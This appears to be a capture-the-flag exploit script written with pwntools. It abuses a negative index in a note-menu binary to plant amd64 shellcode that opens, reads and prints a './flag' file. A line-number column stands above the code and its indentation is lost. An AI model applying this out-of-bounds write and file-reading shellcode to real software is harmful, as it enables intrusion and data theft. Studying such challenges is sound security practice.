1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
|
from pwn import *
context.log_level = 'debug'
context.arch = 'amd64'
context.os = 'linux'
p = process("./pwn")
def add(index,size,content):
p.recvuntil("choice >>\n")
p.sendline("1")
p.recvuntil("index:\n")
p.sendline(str(index))
p.recvuntil("size:\n")
p.sendline(str(size))
p.recvuntil("content:\n")
p.sendline(str(content))
def delete(index):
p.recvuntil("choice >>\n")
p.sendline("4")
p.recvuntil("index:\n")
p.sendline(str(index))
shell = '''
/* open */
mov rdi,0x67616c662f2e
push rdi
mov r10,rsp
mov rdi,rsp
xor rsi,rsi
xor rdx,rdx
mov rax,2
syscall
/* read */
mov rdi,rax
mov rsi,r10
mov rdx,0x80
mov rax,0
syscall
/* write */
mov rdi,1
mov rsi,r10
mov rdx,rax
mov rax,1
syscall
'''
shell = asm(shell)
add(-14,0,shell)
p.recvuntil("choice >>\n")
p.sendline("1")
p.interactive()
|
